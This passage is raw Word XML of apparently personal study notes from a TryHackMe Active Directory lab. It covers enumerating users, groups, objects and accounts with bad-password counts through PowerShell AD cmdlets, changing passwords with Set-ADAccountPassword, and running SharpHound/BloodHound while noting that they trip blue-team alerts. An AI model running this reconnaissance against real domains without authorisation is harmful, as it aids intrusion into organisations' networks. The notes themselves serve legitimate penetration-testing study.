          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009F2DBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>enumerate the password policy of the domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F2B8E6" w14:textId="4B67E2A2" w:rsidR="009F2DBB" w:rsidRDefault="00CA2A98" w:rsidP="00CA2A98">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2A98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>net commands must be executed from a domain-joined machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB5B218" w14:textId="77777777" w:rsidR="00CA2A98" w:rsidRDefault="00CA2A98" w:rsidP="00CA2A98">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31289F77" w14:textId="77777777" w:rsidR="00CA2A98" w:rsidRDefault="00CA2A98" w:rsidP="00CA2A98">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D5F574" w14:textId="2B9D8992" w:rsidR="00CA2A98" w:rsidRDefault="00CA2A98" w:rsidP="00CA2A98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA2A98">
        <w:t>Enumeration through PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B284AB" w14:textId="61E17DF1" w:rsidR="00946C7F" w:rsidRDefault="00385468" w:rsidP="00946C7F">
      <w:r>
        <w:t xml:space="preserve">These Cmdlets </w:t>
      </w:r>
      <w:r w:rsidR="002960F3">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00915FC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00915FC0" w:rsidRPr="00385468">
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00385468">
        <w:t>-RSAT cmdlets</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B3AB8" w14:textId="1FEF2A6C" w:rsidR="00946C7F" w:rsidRDefault="00946C7F" w:rsidP="00946C7F">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00946C7F">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00946C7F">
        <w:t xml:space="preserve"> install the AD-RSAT tooling</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F7ABE1" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:r>
        <w:t xml:space="preserve">May be requirements: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6FE5C" w14:textId="70899EAB" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00385468">
        <w:t>Import-Module ActiveDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FC994A" w14:textId="5583313F" w:rsidR="00385468" w:rsidRPr="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00385468">
        <w:t xml:space="preserve"> Get-WindowsFeature -Name RSAT-AD-PowerShell | Install-WindowsFeature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA950FE" w14:textId="789A8671" w:rsidR="00B827D0" w:rsidRDefault="00B827D0" w:rsidP="00B827D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B55A0">
        <w:t>Get-ADUser cmdlet to enumerate AD users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567FC7AE" w14:textId="092128FA" w:rsidR="00B827D0" w:rsidRPr="000B55A0" w:rsidRDefault="00B827D0" w:rsidP="000B55A0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:t>PS C:\&gt; Get-ADUser -Identity gordon.stevens -Server za.tryhackme.com -Properties *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E2D18" w14:textId="77777777" w:rsidR="000B55A0" w:rsidRPr="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-Identity - </w:t>
      </w:r>
      <w:r w:rsidRPr="000B55A0">
        <w:t>The account name that we are enumerating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E64E7BB" w14:textId="77777777" w:rsidR="000B55A0" w:rsidRPr="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-Properties - </w:t>
      </w:r>
      <w:r w:rsidRPr="000B55A0">
        <w:t>Which properties associated with the account will be shown, * will show all properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6EF481" w14:textId="0A4B407E" w:rsidR="000B55A0" w:rsidRPr="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-Server - </w:t>
      </w:r>
      <w:r w:rsidRPr="000B55A0">
        <w:t xml:space="preserve">Since we are not domain-joined, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B55A0">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B55A0">
        <w:t xml:space="preserve"> use this parameter to point it to our domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61384FA6" w14:textId="77777777" w:rsidR="000B55A0" w:rsidRPr="00B827D0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:t>Get-ADUser -Filter 'Name -like "*stevens"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABAA73F" w14:textId="30A46BCF" w:rsidR="000B55A0" w:rsidRPr="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C0A36B" w14:textId="2C28225A" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADGroup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B55A0">
        <w:t>enumerate AD groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C815211" w14:textId="1B4AAF97" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:t>Get-ADGroup -Identity Administrators -Server za.tryhackme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D423E60" w14:textId="5CD85B95" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADGroupMember</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B55A0">
        <w:t>enumerate group membership </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D5094" w14:textId="13DF0921" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>AD Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B189726" w14:textId="4E1FFC4E" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Get-ADObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137493D" w14:textId="1A8AC2C7" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex: </w:t>
      </w:r>
      <w:r w:rsidRPr="000B55A0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>looking for all AD objects that were changed after a specific date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F8550" w14:textId="77777777" w:rsidR="000B55A0" w:rsidRPr="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:t>PS C:\&gt; $ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5CEB70" w14:textId="5FA72D6F" w:rsidR="000B55A0" w:rsidRPr="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="000B55A0">
        <w:t>PS C:\&gt; Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server za.tryhackme.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194FC6E" w14:textId="77777777" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F37DF39" w14:textId="6194FB4A" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get users that entered their password wrong many times &gt; 0, as we may trick those </w:t>
      </w:r>
      <w:r w:rsidR="00385468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bad users.</w:t>
      </w:r>
      <w:r w:rsidR="00385468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00385468" w:rsidRPr="00385468">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>Get-ADObject -Filter '</w:t>
      </w:r>
      <w:r w:rsidR="00385468" w:rsidRPr="00385468">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>badPwdCount</w:t>
      </w:r>
      <w:r w:rsidR="00385468" w:rsidRPr="00385468">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> -gt 0' -Server za.tryhackme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F95CB" w14:textId="77777777" w:rsidR="000B55A0" w:rsidRDefault="000B55A0" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67794376" w14:textId="4D0B2925" w:rsidR="00385468" w:rsidRPr="00385468" w:rsidRDefault="00385468" w:rsidP="000B55A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA2C00" w14:textId="18F978F1" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-ADDomain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00385468">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>Get-ADDomain -Server za.tryhackme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7662C720" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC19B4E" w14:textId="0F3292F5" w:rsidR="00385468" w:rsidRPr="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Altering AD Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3BE066" w14:textId="7847BBDC" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>considered AD exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3D2F5" w14:textId="1D2C972A" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set-ADAccountPassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00385468">
        <w:t>changing the password of our AD user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FDDDBE" w14:textId="111510F4" w:rsidR="00CA0D55" w:rsidRPr="00CA0D55" w:rsidRDefault="00CA0D55" w:rsidP="00CA0D55">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA0D55">
        <w:t xml:space="preserve">PS C:\&gt; Set-ADAccountPassword -Identity </w:t>
      </w:r>
      <w:r>
        <w:t>[username]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0D55">
        <w:t xml:space="preserve"> -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "</w:t>
      </w:r>
      <w:r>
        <w:t>[old-pass]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0D55">
        <w:t>" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "</w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0D55">
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>-pass]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA0D55">
        <w:t>" -Force)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA78562" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A01910" w14:textId="77777777" w:rsidR="00385468" w:rsidRDefault="00385468" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E56DE0" w14:textId="2632E78A" w:rsidR="00385468" w:rsidRDefault="00AF662D" w:rsidP="00AF662D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF662D">
        <w:t>Enumeration through Bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42705D34" w14:textId="2B534CE3" w:rsidR="00385468" w:rsidRDefault="001C5486" w:rsidP="00DE5E6B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bloodhound: </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:t>tool to graph the Active Directory, it visualizes the information</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in .</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> format</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:t xml:space="preserve"> gained from </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Sharphound</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:t xml:space="preserve"> tool that runs on the victim machine in domain</w:t>
      </w:r>
      <w:r w:rsidR="00DE5E6B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DE5E6B" w:rsidRPr="00DE5E6B">
        <w:t>it is written in C#</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C6A67" w14:textId="6FBF5378" w:rsidR="00385468" w:rsidRDefault="001C5486" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Based on neo4j Database (non-SQL DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E341BA" w14:textId="72D99C82" w:rsidR="00385468" w:rsidRDefault="001C5486" w:rsidP="00385468">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sharphound Enumerate, Bloodhound Visualize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC4B7A" w14:textId="77777777" w:rsidR="001C5486" w:rsidRDefault="001C5486" w:rsidP="001C5486">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDA0B0A" w14:textId="7AC237A5" w:rsidR="00385468" w:rsidRDefault="001C5486" w:rsidP="001C5486">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sharphound collector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> types</w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A36F49A" w14:textId="2A3D8A53" w:rsidR="001C5486" w:rsidRPr="001C5486" w:rsidRDefault="001C5486" w:rsidP="001C5486">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sharphound.ps1 - </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:t xml:space="preserve">PowerShell script for running Sharphound. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C5486">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C5486">
        <w:t xml:space="preserve"> latest release of Sharphound has stopped releasing the PowerShell script version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69528365" w14:textId="77777777" w:rsidR="001C5486" w:rsidRPr="001C5486" w:rsidRDefault="001C5486" w:rsidP="001C5486">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sharphound.exe - </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:t>A Windows executable version for running Sharphound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D87B686" w14:textId="7251F9B5" w:rsidR="001C5486" w:rsidRDefault="001C5486" w:rsidP="001C5486">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5486">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AzureHound.ps1 - </w:t>
      </w:r>
      <w:r w:rsidRPr="001C5486">
        <w:t>PowerShell script for running Sharphound for Azure (Microsoft Cloud Computing Services) instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78267410" w14:textId="605C2FCE" w:rsidR="00A17262" w:rsidRPr="001C5486" w:rsidRDefault="00A17262" w:rsidP="00A17262">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A17262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: Your Bloodhound and Sharphound versions must </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A17262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>match for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A17262">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> the best results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBED94B" w14:textId="77777777" w:rsidR="00F84008" w:rsidRPr="00F84008" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:r w:rsidRPr="00F84008">
        <w:t xml:space="preserve">Sharphound files will be detected as malware and raise an alert to the blue team. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EC0FA" w14:textId="417787A3" w:rsidR="001C5486" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:r w:rsidRPr="00F84008">
        <w:t>We can use the runas command to inject the AD credentials and point Sharphound to a Domain Controller</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610ED915" w14:textId="3ED4F74F" w:rsidR="00F84008" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F84008">
        <w:t>Sharphound.exe --CollectionMethods &lt;Methods&gt; --Domain za.tryhackme.com --ExcludeDCs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D361F" w14:textId="77777777" w:rsidR="00F84008" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CollectionMethods</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84008">
        <w:t xml:space="preserve"> - Determines what kind of data Sharphound would collect. The most common options are Default or All. Also, since Sharphound </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F84008">
        <w:t>caches</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F84008">
        <w:t xml:space="preserve"> information, once the first run has been completed, you can only use the Session collection method to retrieve new user sessions to speed up the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A3476" w14:textId="247BB7DB" w:rsidR="00F84008" w:rsidRPr="00F84008" w:rsidRDefault="00F84008" w:rsidP="00F84008">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
